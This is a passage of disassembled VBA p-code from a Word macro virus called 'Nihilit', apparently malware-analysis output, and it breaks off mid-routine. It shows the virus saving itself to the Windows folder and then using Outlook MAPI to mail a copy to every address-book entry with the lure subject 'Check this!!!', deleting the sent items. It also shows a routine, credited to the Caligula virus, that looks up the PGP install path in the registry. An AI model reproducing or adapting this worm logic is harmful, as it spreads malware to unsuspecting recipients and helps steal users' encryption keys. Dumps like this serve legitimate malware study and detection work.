' ArgsMemCall TypeText 0x0001
' EndIf
' Line #92:
' LitStr 0x0016 "C:\Windows\Nihilit.doc"
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed FileFormat
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0002
' Line #93:
' SetStmt
' LitStr 0x0013 "Outlook.Application"
' ArgsLd CreateObject 0x0001
' Set Ni_OApp
' Line #94:
' SetStmt
' LitStr 0x0004 "MAPI"
' Ld Ni_OApp
' ArgsMemLd GetNameSpace 0x0001
' Set Ni_Mapi
' Line #95:
' StartForVariable
' Ld Ni_AddList
' EndForVariable
' Ld Ni_Mapi
' MemLd AddressLists
' ForEach
' Line #96:
' StartForVariable
' Next
' Line #97:
' Ld Ni_AddList
' MemLd AddressEntries
' MemLd Count
' LitDI2 0x0000
' Ne
' IfBlock
' Line #98:
' StartForVariable
' Ld Ni_AddListCount
' EndForVariable
' LitDI2 0x0001
' Ld Ni_AddList
' MemLd AddressEntries
' MemLd Count
' For
' Line #99:
' StartForVariable
' Next
' Line #100:
' SetStmt
' Ld Ni_AddListCount
' Ld Ni_AddList
' ArgsMemLd AddressEntries 0x0001
' Set Ni_AddListEntry
' Line #101:
' SetStmt
' LitDI2 0x0000
' Ld Ni_OApp
' ArgsMemLd CreateItem 0x0001
' Set Ni_msg
' Line #102:
' Ld Ni_AddListEntry
' MemLd Address
' Ld Ni_msg
' MemSt To
' Line #103:
' LitStr 0x000D "Check this!!!"
' Ld Ni_msg
' MemSt Subject
' Line #104:
' LitStr 0x0018 "I like this story!!!;o)."
' Ld vbCrLf
' Add
' LitStr 0x0007 "Nihilit"
' Add
' Ld Ni_msg
' MemSt Body
' Line #105:
' LitStr 0x0006 "WINDIR"
' ArgsLd Environ 0x0001
' LitStr 0x000C "\Nihilit.doc"
' Concat
' Ld Ni_msg
' MemLd Attachments
' ArgsMemCall Add 0x0001
' Line #106:
' LitVarSpecial (True)
' Ld Ni_msg
' MemSt DeleteAfterSubmit
' Line #107:
' Ld Ni_msg
' MemLd To
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #108:
' Ld Ni_msg
' ArgsMemCall Send 0x0000
' Line #109:
' EndIfBlock
' Line #110:
' EndIfBlock
' Line #111:
' EndSub
' Line #112:
' Line #113:
' FuncDefn (Sub Pgp())
' Line #114:
' OnError (Resume Next)
' Line #115:
' QuoteRem 0x0000 0x0033 "taken from W97M/Caligula Virus by Opic/CodeBreakers"
' Line #116:
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x0007 "Nihilit"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitVarSpecial (False)
' Eq
' Paren
' IfBlock
' Line #117:
' LitStr 0x0000 ""
' LitStr 0x0037 "HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command"
' LitStr 0x0000 ""
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' St pgppath
' Line #118:
' LitDI2 0x0001
' Ld pgppath
' LitStr 0x0004 "pgpt"
' FnInStr3
' St Position
' Line #119:
' Line #120:
' Ld Position
' LitDI2 0x0000
' Ne
' IfBlock
' Line #121:
' Ld pgppath
' LitDI2 0x0001
' Ld Position
' LitDI2 0x0002
' Sub
' ArgsLd Mid 0x0003
' St pgppath
' Line #122:
' ElseBlock
' Line #123:
…